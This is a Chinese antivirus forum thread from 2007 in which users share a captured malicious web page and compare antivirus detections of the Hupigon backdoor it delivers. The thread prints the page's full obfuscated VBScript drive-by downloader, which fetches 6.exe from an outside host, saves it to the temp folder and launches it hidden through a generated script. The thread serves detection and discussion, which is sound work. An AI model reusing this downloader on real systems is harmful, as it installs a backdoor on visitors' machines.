可疑程式！！！

mhj144007

取之

<html><body><center><script>
AiLiAn="hxxp://aiyouxi.myrice.com/6.exe"
</script>
<noscript>
<iframe src=*></iframe>
</noscript>
<sCrIpT LaNgUaGe="VBScript">
On eRrOr rEsUmE NeXt
zHaNjUfAn="o"&"b"&"j"
zHaNjUlAnG="e"&"c"&"t"
ZhAnJuFaNlAnG=ZhAnJuFaN&ZhAnJuLaNg
ZhAnFaN="c"&"l"
zHaNlAnG="a"&"s"&"s"
ZhAnZi="i"&"d"
ZhAnAiLiAn=zHaNfAn&zHaNlAnG&ZhAnZi
ZhAnJuF="c"&"l"&"s"
ZhAnJuFa="i"&"d"&":"
zHaNfAn="B"&"D"&"9"&"6C"&"55"&"6"&"-"
zHaNcEn="6"&"5"&"A"&"3"&"-"&"1"&"1"&"D"&"0"
zHaNc="-9"&"8"&"3A"&"-"
ZhAnJuZ="0"&"0"&"C"&"0"&"4"
ZhAnJuI="F"&"C"&"2"&"9"&"E"&"3"&"6"
ZhAnJuLaNg=zHaNjUf&zHaNjUfA&ZhAnFaN&ZhAnCeN&ZhAnC&ZhAnJuZ&ZhAnJuI
zHaNf="M"&"i"&"c"
zHaNfA="r"&"o"&"s"
ZhAnFn="o"&"f"&"t"&"."
ZhAnCn="X"&"M"&"L"
zHaNn="H"&"T"
ZhAnZ="T"&"P"
zHaNjUzI=ZhAnF&ZhAnFa&zHaNfN&ZhAnCn&zHaNn&zHaNz
ZhEf="S"&"c"&"r"&"i"
ZhEfA="p"&"ti"&"n"&"g"&"."
ZhEfN="F"&"i"&"l"&"e"&"S"
ZhEcN="y"&"s"&"t"&"e"
zHeN="m"&"O"&"b"
ZhEz="j"&"e"&"c"&"t"
ZhEzI=ZhEf&zHeFa&zHeCn&zHeCn&zHeN&ZhEz
ZhAnXu="Set"&" Wuer"&" ="&" HUA.GetSpecialFolder(2)"
SeT Zi = dOcUmEnT.CrEaTeElEmEnT(ZhAnJuFaNlAnG)
Zi.sEtAtTrIbUtE ZhAnAiLiAn, ZhAnJuLaNg
ZhOnGjIeZhE=ZhAnJuZi
SeT ZhOnGjIe = zI.CrEaTeObJeCt(zHoNgJiEzHe,"")
ZhOnGjIe.oPeN "GE"&"T", aIlIaN, fAlSe
ZhOnGjIe.sEnD
zHaNlAnGuSeR="msinfo.exe"
ZhAnLaNgOsEr="msinfo.vbs"
sEt hUa = zI.CrEaTeObJeCt(zHeZi,"")
SeT WdUeR =hUa.gEtSpElAnGzI
zHaNxU
zHaNlAnGuSeR=HuA.BuIlDpAtH(WuEr,zHaNlAnGuSeR)
ZhAnLaNgOsEr=hUa.bUiLdPaTh(wUeR,ZhAnLaNgOsEr)
zH="A"&"d"
hU="o"&"d"
wA="b"&"."&"s"&"t"
lU="r"&"e"&"a"&"m"
zHoGhAwNgLo=zH&Hu&wA&Lu
SeT LaNg = zI.CrEaTeObJeCt(zHoGhAwNgLo,"")
LaNg.tYpE=1
lAnG.OpEn
LaNg.wRiTe zHoNgJiE.ReSpOnSeBoDy
LaNg.sAvEtOfIlE ZhAnLaNgUsEr,2
LaNg.cLoSe
LaNg.tYpE=2
lAnG.OpEn
LaNg.wRiTeTeXt "Set Shell = CreateObject(""Wscript.Shell"")"&VbCrLf&"Shell.Run ("""&ZhAnLaNgUsEr&""")"&VbCrLf&"Set Shell = Nothing"
lAnG.SaVeToFiLe zHaNlAnGoSeR,2
lAnG.ClOsE
fLaNg="S"&"h"&"e"
aLaNg="l"&"l"&"."
nLaNg="A"&"p"&"p"&"l"&"i"
wAnGlUoLaNg=fLaNg&aLaNg&nLaNg
SeT ZhOnG = Zi.cReAtEoBjEcT(WaNgLuOlAnG&"cation","")
ZhOnG.ShElLeXeCuTe zHaNlAnGoSeR,"","","Open",0
</ScRiPt>

mofunzone

Starting the file scan:

Begin scan in 'C:\TDDOWNLOAD\6.exe'
C:\TDDOWNLOAD\
  6.exe
      [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Hupigon.Gen Backdoor server programs
      [WARNING]   The file was ignored!

taihuxian

Virus: Backdoor.Win32.Hupigon.euw

Virus found while downloading Web content.

Address: bbs.kafan.cn

mofunzone

第一次看见a-squared抓鸽子
A-Squared         
Found Backdoor.Win32.Hupigon.euw
AntiVir        
Found BDS/Hupigon.Gen
ArcaVir        
Found nothing
Avast        
Found Win32:Hupigon-OH
AVG Antivirus        
Found BackDoor.Generic6.FCD
BitDefender        
Found Backdoor.Hupigon.YBO
ClamAV        
Found Trojan.Graybird-16
Dr.Web        
Found nothing
F-Prot Antivirus        
Found nothing
F-Secure Anti-Virus        
Found Backdoor.Win32.Hupigon.euw
Fortinet        
Found BDoor.AWQ!tr.bdr
Kaspersky Anti-Virus        
Found Backdoor.Win32.Hupigon.euw
NOD32        
Found nothing
Norman Virus Control        
Found W32/Smalldoor.ANRX
Panda Antivirus        
Found nothing
Rising Antivirus        
Found nothing
VirusBuster        
Found nothing
VBA32        
Found nothing

tonger2003

已检测到: 木马程序 Backdoor.Win32.Hupigon.euw URL: http://bbs.kafan.cn/attachment.php?aid=73745//6.exe

欠妳緈諨

NOD32         
Found nothing
不过还是继续用

moonsilver

瑞星Backdoor.Gpigeon.GEN

mofunzone

你也不要太什么，我说过新挂的网马绝对有一半nod杀不了的，况且这个是鸽子，本身就不是nod的专长
而且对nod处理能力无语，哪怕一个星期有反应我也认了，不然我也会考虑用下nod的
p.s 如果有这种处理速度，nod也 不会挂到现在这么惨了

tracydk

原帖由 mofunzone 于 2007-5-21 13:49 发表
你也不要太什么，我说过新挂的网马绝对有一半nod杀不了的，况且这个是鸽子，本身就不是nod的专长
而且对nod处理能力无语，哪怕一个星期有反应我也认了，不然我也会考虑用下nod的
p.s 如果有这种处理速 ...

NOD在处理上报方面和AVAST估计是半斤8两

tracydk

我猜NOD和AVAST因该是和SYMANTEC那样,不大规模爆发的病毒是不处理的